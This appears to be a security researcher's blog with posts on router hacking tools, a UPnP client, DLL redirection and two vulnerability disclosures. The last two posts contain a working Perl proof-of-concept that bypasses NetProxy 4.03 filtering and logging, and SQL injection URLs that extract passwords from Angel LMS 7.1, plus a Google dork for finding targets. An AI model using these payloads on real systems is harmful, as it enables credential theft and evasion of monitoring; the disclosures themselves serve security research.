WiFinger Passive Wireless Fingerprinting Tool

May 9th, 2009

Here is one of the tools we presented at our ChicagoCon talk. It passively identifies wireless access points based on matching the Information Elements in their beacon packets against a fingerprint database. It is written in Python and uses Scapy, and has been tested in Linux.

Currently we only have a handful of signatures, so if you want to contribute to this tool, here’s what you can do:

  1. Get your access point and enable WPA and WPS (if supported).
  2. Capture the beacon frames that your access point is broadcasting and save them to a pcap file.
  3. Send us the pcap file along with as much information about the access point as you can (make, model, firmware version, hardware revision, ESSID and BSSID).

Once we get your submission we’ll generate a signature for it and update the WiFinger database file. We think this tool has a lot of great potential, so we welcome any and all submissions – if you’ve got a router, let’s put it in there!

WiFinger can be downloaded here.

, ,

ChicagoCon 2009s

April 29th, 2009

We’re just now putting the finishing touches on our presentation for the ChicagoCon 2009s security conference coming up next week. We will be discussing some of the “more serious issues” that we mentioned when we released our Hacking SOHO Routers paper late last year. In addition to releasing some new tools, our presentation topics include router reconnaissance, alternative attacks against WPA/WEP encryption, and how to hack a router with a stick of gum.

As always, there are going to be a lot of other great talks there too; tickets are still available and are only $100 for the conference, so if you’re going to be in the Chicago area May 8th and 9th, we hope you’ll stop by!

, , ,

Plug-N-Play Network Hacking

December 4th, 2008

I’ve just published a new article on my column over at Ethical Hacker describing the UPNP protocol, and how to hack it using Miranda. Don came up with a great image for the article too…you can check it out here!

, ,

Hacking the Routers: SOHO Router Security

November 9th, 2008

We’ve been taking a close look at some popular SOHO routers lately, and have started to find some really interesting stuff. It’s actually a little disconcerting – I don’t think that we have seen a router that doesn’t contain some type of exploitable vulnerability. We’ve written up a preliminary paper detailing some of the issues that we’ve discovered; there are some other, more serious issues that we’re still in the middle of investigating and we’ll hopefully have more information about those up here soon. An excerpt from the introduction:

With embedded devices permeating today’s home networks, they have begun to attract a higher level of scrutiny from the security community than in previous years. In particular, the members of GNUCitizen have been relentlessly testing routers and wireless access points. Their discovery of multiple vulnerabilities in the BT Home Hub router affected a wide range of home networks in the UK [1], and their Router Hacking Challenge prompted a flurry of vulnerability reports against a variety of popular home routers, including the venerable Linksys WRT54G [2]. Specific vulnerabilities in home routers range from traditional Web attacks, such as XSS and CSRF, to authentication bypass attacks and buffer overflows; it is assumed that the reader has at least a passing knowledge of the attacks described in this paper.

The purpose of this paper is to outline the security measures being taken by vendors to prevent such attacks in their home routing products, what those security measures accomplish, and where they fall short. We will use existing network tools to examine common vulnerabilities in a range of popular devices and demonstrate weaknesses in the security of those devices; additionally, we will examine common trends in security measures that have been duplicated across vendors, and examine how those trends help and hinder the security of their devices. In particular, we will examine the following home routers, which are some of the latest offerings from their respective vendors at the time of this writing:

 

  • Linksys WRT160N
  • D-Link DIR-615
  • Belkin F5D8233-4v3
  • ActionTec MI424-WR

 

Read the entire article here.

, ,

Miranda UPNP Administration Tool

November 7th, 2008

Miranda is a Python-based Universal Plug-N-Play client application designed to discover, query and interact with UPNP devices, particularly Internet Gateway Devices (aka, routers). It can be used to audit UPNP-enabled devices on a network for possible vulnerabilities. Some of its features include:

  • Interactive shell with tab completion and command history
  • Passive and active discovery of UPNP devices
  • Customizable MSEARCH queries (query for specific devices/services)
  • Full control over application settings such as IP addresses, ports and headers
  • Simple enumeration of UPNP devices, services, actions and variables
  • Correlation of input/output state variables with service actions
  • Ability to send actions to UPNP services/devices
  • Ability to save data to file for later analysis and collaboration
  • Command logging

Miranda was built on and for a Linux system and has been tested on a Linux 2.6 kernel with Python 2.5. However, since it is written in Python, most functionality should be available for any Python-supported platform. Miranda has been tested against IGDs from various vendors, including Linksys, D-Link, Belkin and ActionTec. All Python modules came installed by default on a Linux Mint 5 (Ubuntu 8.04) test system.

For more information about UPNP, visit the UPNP Forum. For information regarding UPNP vulnerabilities, see UPNP Hacks and GNUCitizen.

Download Miranda!

, ,

Windows DLL Redirection

November 3rd, 2008

In Windows, all applications must communicate with the kernel through API functions; as such, these functions are critical to even the simplest Windows application. Thus, the ability to intercept, monitor, and modify a program’s API calls, commonly called API hooking, effectively gives one full control over that process. This can be useful for a multitude of reasons, including debugging, reverse engineering, and hacking (in all interpretations of the word).

While there are several methods which can be used to achieve our goal, this tutorial will examine only DLL redirection. This approach was chosen for several reasons:

  • It is relatively simple to implement.
  • It allows us to view and modify parameters passed to an API function, change return values of that function, and run any other code we desire.
  • While most other methods require code to be injected into the target process or run from an external application, DLL redirection requires only write access to the target application’s working directory.
  • We can intercept any API call without modifying the target (either on disk or in memory) or any system files.

The full article has been posted on EthicalHacker.net and milw0rm.com.

,

NetProxy 4.03 Web Filter Evasion

November 3rd, 2008

Sending a specially crafted request to the NetProxy proxy server allows users to view restricted Web content and bypass the proxy’s logging feature.

Description
Assume that access to http://www.milw0rm.com has been blocked. The standard query string sent to NetProxy looks like:

GET http://www.milw0rm.com HTTP/1.0

NetProxy recognizes that this is a blocked URL and subsequently blocks the request. However, sending a request without ‘http://’ in the URL allows access to the blocked URL (note that the port must be manually specified as well):

GET www.milw0rm.com:80 HTTP/1.0

In addition, requests made in this manner are not logged to NetProxy’s connection log file.

Exploit POC
#!/usr/bin/perl
use IO::Socket;

#Define the NetProxy server and port
$proxy_ip = "127.0.0.1";
$proxy_port = "8080";

#Set the site, port and page to request
$site = "www.milw0rm.com";
$port = "80";
$page = "index.html";

#Define FF and IE user agent strings
$ms_ie = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)";
$ms_ff = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1";

#Create connection to NetProxy
my $sock = new IO::Socket::INET(
Proto => 'tcp',
PeerAddr => $proxy_ip,
PeerPort => $proxy_port,
);
die "Failed to connect to [$proxy_ip:$proxy_port] : $!\n" unless $sock;

#Format the request
$request = "GET $site:$port/$page HTTP/1.0\r\n";
$request .= "User-Agent: $ms_ff\r\n";
$request .= "\r\n";

#Send the request
print $sock $request;

#Read the reply
while(<$sock>){
$reply .= $_;
}

close($sock);

#Separate NetProxy header from HTML
($header,$html) = split("\r\n\r",$reply);

print $html;

exit;

Credits
Discovered by Craig Heffner and originally posted on milw0rm.

Angel LMS 7.1 SQL Injection Vulnerability

November 3rd, 2008

Angel LMS 7.1 contains a SQL injection vulnerability in the /section/default.asp page that grants an un-authenticated users access to all database tables and data. Examples include enumeration of tables, columns, user names, passwords, grades, and test questions/answers (you basically have access to everything).

Exploit POC
/section/default.asp?id=’+union+select+top+1+username+from+faculty_accounts–”
/section/default.asp?id=’+union+select+top+1+username+from+accounts–”
/section/default.asp?id=’+union+select+top+1+password+from+accounts–”

Google Dork
intext:”2006 angel learning, inc” -pdf

Credits
Vulnerability discovered by Craig Heffner, originally posted on milw0rm.

,

Next Entries »